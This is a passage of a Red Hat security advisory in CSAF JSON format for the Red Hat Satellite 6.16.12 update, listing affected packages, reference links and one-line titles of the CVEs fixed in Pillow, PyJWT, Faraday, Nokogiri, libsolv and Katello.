| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64 | — | ||
| Unresolved product id: 8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — | ||
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src | — | ||
| Unresolved product id: 9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch | — | ||
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src | — |
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2026:50223 | self |
| https://access.redhat.com/security/updates/classi… | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2396054 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2458187 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2460425 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2482734 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2489812 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2492252 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2492952 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497452 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497455 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497464 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497466 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500043 | external |
| https://issues.redhat.com/browse/SAT-44868 | external |
| https://issues.redhat.com/browse/SAT-48146 | external |
| https://issues.redhat.com/browse/SAT-48289 | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2025-9230 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2396054 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-9230 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-9230 | external |
| https://access.redhat.com/security/cve/CVE-2026-2332 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2458187 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-2332 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-2332 | external |
| https://github.com/jetty/jetty.project/security/a… | external |
| https://gitlab.eclipse.org/security/cve-assignmen… | external |
| https://access.redhat.com/security/cve/CVE-2026-12515 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2489812 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-12515 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-12515 | external |
| https://github.com/Katello/katello/pull/11712 | external |
| https://access.redhat.com/security/cve/CVE-2026-48526 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2482734 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-48526 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-48526 | external |
| https://github.com/jpadilla/pyjwt/security/adviso… | external |
| https://access.redhat.com/security/cve/CVE-2026-48864 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2460425 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-48864 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-48864 | external |
| https://access.redhat.com/security/cve/CVE-2026-54059 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497464 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-54059 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-54059 | external |
| https://github.com/python-pillow/Pillow/blob/main… | external |
| https://github.com/python-pillow/Pillow/commit/0a… | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-54060 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497466 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-54060 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-54060 | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-54297 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2492252 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-54297 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-54297 | external |
| https://github.com/lostisland/faraday/security/ad… | external |
| https://access.redhat.com/security/cve/CVE-2026-55379 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497452 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-55379 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-55379 | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-55380 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497455 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-55380 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-55380 | external |
| https://github.com/python-pillow/Pillow/commit/f3… | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-57236 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2492952 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-57236 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-57236 | external |
| https://github.com/sparklemotion/nokogiri/securit… | external |
| https://access.redhat.com/security/cve/CVE-2026-59197 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500043 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59197 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59197 | external |
| https://github.com/python-pillow/Pillow/commit/cc… | external |
| https://github.com/python-pillow/Pillow/pull/9695 | external |
| https://github.com/python-pillow/Pillow/releases/… | external |
| https://github.com/python-pillow/Pillow/security/… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Satellite 6.16 for RHEL 8 and RHEL 9.\n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Satellite is a system management solution that allows organizations\nto configure and maintain their systems without the necessity to provide\npublic Internet access to their servers or other client systems. It\nperforms provisioning and configuration management of predefined standard\noperating environments.\n\nSecurity Fix(es):\n\n* puppet-agent: Out-of-bounds read \u0026 write in RFC 3211 KEK Unwrap (CVE-2025-9230)\n\n* puppetserver: HTTP request smuggling via chunked extension quoted-string parsing (CVE-2026-2332)\n\n* python-pillow: Pillow: Denial of Service via crafted BDF font file (CVE-2026-55379)\n\n* python-pillow: Pillow: Denial of Service via crafted GD 2.x image file (CVE-2026-55380)\n\n* python-pillow: Pillow: Denial of Service via crafted PCF font data (CVE-2026-54059)\n\n* python-pillow: Pillow: Denial of Service via excessive memory allocation when processing font files (CVE-2026-54060)\n\n* python-pillow: Pillow: Native heap out-of-bounds write (CVE-2026-59197)\n\n* python-pyjwt: PyJWT: Authentication bypass due to forged JSON Web Tokens (CVE-2026-48526)\n\n* rubygem-faraday-cookie_jar: Faraday: Denial of Service via crafted nested query strings (CVE-2026-54297)\n\n* rubygem-faraday-em_http: Faraday: Denial of Service via crafted nested query strings (CVE-2026-54297)\n\n* rubygem-faraday-em_synchrony: Faraday: Denial of Service via crafted nested query strings (CVE-2026-54297)\n\n* rubygem-faraday-excon: Faraday: Denial of Service via crafted nested query strings (CVE-2026-54297)\n\n* rubygem-faraday: Faraday: Denial of Service via crafted nested query strings (CVE-2026-54297)\n\n* rubygem-faraday-httpclient: Faraday: Denial of Service via crafted nested query strings (CVE-2026-54297)\n\n* rubygem-faraday_middleware: Faraday: Denial of Service via crafted nested query strings (CVE-2026-54297)\n\n* rubygem-faraday-multipart: Faraday: Denial of Service via crafted nested query strings (CVE-2026-54297)\n\n* rubygem-faraday-net_http: Faraday: Denial of Service via crafted nested query strings (CVE-2026-54297)\n\n* rubygem-faraday-net_http_persistent: Faraday: Denial of Service via crafted nested query strings (CVE-2026-54297)\n\n* rubygem-faraday-patron: Faraday: Denial of Service via crafted nested query strings (CVE-2026-54297)\n\n* rubygem-faraday-rack: Faraday: Denial of Service via crafted nested query strings (CVE-2026-54297)\n\n* rubygem-faraday-retry: Faraday: Denial of Service via crafted nested query strings (CVE-2026-54297)\n\n* rubygem-katello: missing repository authorization in content_uploads exposes cross-product content existence (CVE-2026-12515)\n\n* rubygem-nokogiri: Nokogiri: Denial of Service or Information Disclosure via invalid encoding handling (CVE-2026-57236)\n\n* libsolv: Heap buffer overflow in libsolv repopagestore via unchecked decompression of malicious .solv page data (CVE-2026-48864)\n\nBug Fix(es):\n\n* scap-security-guide-satellite: Update of scap-security-guide-satellite package sources\n\n* \u0027Katello::Errors::Pulp3Error: nextval: reached maximum value of sequence \"container_blobmanifest_id_seq\"\u0027 during container image sync",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:50223",
"url": "https://access.redhat.com/errata/RHSA-2026:50223"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2396054",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2396054"
},
{
"category": "external",
"summary": "2458187",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458187"
},
{
"category": "external",
"summary": "2460425",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460425"
},
{
"category": "external",
"summary": "2482734",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482734"
},
{
"category": "external",
"summary": "2489812",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2489812"
},
{
"category": "external",
"summary": "2492252",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492252"
},
{
"category": "external",
"summary": "2492952",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492952"
},
{
"category": "external",
"summary": "2497452",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497452"
},
{
"category": "external",
"summary": "2497455",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497455"
},
{
"category": "external",
"summary": "2497464",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497464"
},
{
"category": "external",
"summary": "2497466",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497466"
},
{
"category": "external",
"summary": "2500043",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500043"
},
{
"category": "external",
"summary": "SAT-44868",
"url": "https://issues.redhat.com/browse/SAT-44868"
},
{
"category": "external",
"summary": "SAT-48146",
"url": "https://issues.redhat.com/browse/SAT-48146"
},
{
"category": "external",
"summary": "SAT-48289",
"url": "https://issues.redhat.com/browse/SAT-48289"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_50223.json"
}
],
"title": "Red Hat Security Advisory: Satellite 6.16.12 Async Update",
"tracking": {
"current_release_date": "2026-08-04T22:36:06+00:00",
"generator": {
"date": "2026-08-04T22:36:06+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.8"
}
},
"id": "RHSA-2026:50223",
"initial_release_date": "2026-08-04T16:04:50+00:00",
"revision_history": [
{
"date": "2026-08-04T16:04:50+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-08-04T16:04:50+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-08-04T22:36:06+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Satellite 6.16 for RHEL 8",
"product": {
"name": "Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:satellite:6.16::el8"
}
}
},
{
"category": "product_name",
"name": "Red Hat Satellite 6.16 for RHEL 8",
"product": {
"name": "Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-capsule",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:satellite_capsule:6.16::el8"
}
}
},
{
"category": "product_name",
"name": "Red Hat Satellite 6.16 for RHEL 8",
"product": {
"name": "Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-maintenance",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:satellite_maintenance:6.16::el8"
}
}
},
{
"category": "product_name",
"name": "Red Hat Satellite 6.16 for RHEL 8",
"product": {
"name": "Red Hat Satellite 6.16 for RHEL 8",
"product_id": "8Base-satellite-6.16-utils",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:satellite_utils:6.16::el8"
}
}
},
{
"category": "product_name",
"name": "Red Hat Satellite 6.16 for RHEL 9",
"product": {
"name": "Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:satellite:6.16::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Satellite 6.16 for RHEL 9",
"product": {
"name": "Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-capsule",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:satellite_capsule:6.16::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Satellite 6.16 for RHEL 9",
"product": {
"name": "Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-maintenance",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:satellite_maintenance:6.16::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Satellite 6.16 for RHEL 9",
"product": {
"name": "Red Hat Satellite 6.16 for RHEL 9",
"product_id": "9Base-satellite-6.16-utils",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:satellite_utils:6.16::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Satellite 6"
},
{
"branches": [
{
"category": "product_version",
"name": "rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"product": {
"name": "rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"product_id": "rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-foreman_maintain@1.7.15-1.el8sat?arch=src\u0026epoch=1"
}
}
},
{
"category": "product_version",
